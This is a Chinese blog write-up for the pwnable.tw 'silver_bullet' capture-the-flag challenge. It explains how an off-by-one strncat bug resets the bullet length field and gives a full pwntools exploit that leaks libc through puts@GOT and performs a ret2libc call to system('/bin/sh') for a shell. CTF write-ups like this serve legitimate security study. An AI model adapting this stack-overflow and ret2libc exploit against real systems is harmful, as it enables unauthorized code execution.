zoukankan      html  css  js  c++  java

  • pwnable.tw silver_bullet

    产生漏洞的原因

    int __cdecl power_up(char *dest)
{
  char s; // [esp+0h] [ebp-34h]
  size_t new_len; // [esp+30h] [ebp-4h]

  new_len = 0;
  memset(&s, 0, 0x30u);
  if ( !*dest )
    return puts("You need create the bullet first !");
  if ( *((_DWORD *)dest + 12) > 47u )           // len>47
    return puts("You can't power up any more !");
  printf("Give me your another description of bullet :");
  read_input(&s, 48 - *((_DWORD *)dest + 12));
  strncat(dest, &s, 48 - *((_DWORD *)dest + 12));// strncat会在dest结尾添加结束符,而记录字符串长度的位置正好位于s+0x30的位置,
                                                // s+0x30在strncat添加字符串长度为0x30时会被覆盖为0
  new_len = strlen(&s) + *((_DWORD *)dest + 12);// s+0x30被覆盖为0后new_len变为附加字符串的长度
  printf("Your new power is : %u
", new_len);
  *((_DWORD *)dest + 12) = new_len;
  return puts("Enjoy it !");
}

    脚本

    from pwn import *

    context.log_level='DEBUG'


    r=remote('chall.pwnable.tw',10103)
    file=ELF('./silver_bullet')
    libc=ELF('./libc_32.so.6')
    '''
    r=process('./silver_bullet')
    file=ELF('./silver_bullet')
    libc=ELF('/lib/i386-linux-gnu/libc-2.28.so')
    '''

    #trigger stack overflow
    r.recvuntil('Your choice :')
    r.sendline('1')
    r.recvuntil('Give me your description of bullet :')
    r.send('a'*47)
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    r.send('b')
    #gdb.attach(r)

    #leak libc
    r.recvuntil('Your choice :')
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    start=0x080484F0
    payload='xff'*3+p32(0xdeadbeaf)+p32(file.plt['puts'])+p32(start)+p32(file.got['puts'])
    payload+=(47-len(payload))*'a'
    r.send(payload)
    r.recvuntil('Your choice :')
    r.sendline('3')
    r.recvuntil('Oh ! You win !!
')
    libc_base=u32(r.recv(4))-libc.sym['puts']
    success('libc_base:'+hex(libc_base))
    sys_addr=libc_base+libc.sym['system']
    binsh_addr=libc_base+libc.search('/bin/sh').next()
    success('binsh_addr'+hex(binsh_addr))
    #gdb.attach(r)

    #trigger stack overflow again
    r.recvuntil('Your choice :')
    r.sendline('1')
    r.recvuntil('Give me your description of bullet :')
    r.send('a'*47)
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    r.send('b')

    #trigger system('/bin/sh') call
    r.recvuntil('Your choice :')
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    payload1='xff'*3+p32(0xdeadbeaf)+p32(sys_addr)+p32(0xdeadbeaf)+p32(binsh_addr)
    payload1+=(47-len(payload))*'a'
    r.send(payload1)
    r.recvuntil('Your choice :')
    r.sendline('3')
    r.recvuntil('Oh ! You win !!
')
    r.interactive()
  • 相关阅读:
    Jmeter之定时器
    Jmeter环境部署及目录解析
    Linux之shell脚本(基础篇)
    Linux常用命令
    Nginx详细安装部署教程(转)
    lsyncd+rsync文件实时同步
    windows7下搭建robot framework环境
    Python 类和实例
    第一个自动化运维程序
    Python之 set的特点
  • 原文地址:https://www.cnblogs.com/snip3r/p/10628682.html
Copyright © 2011-2022 走看看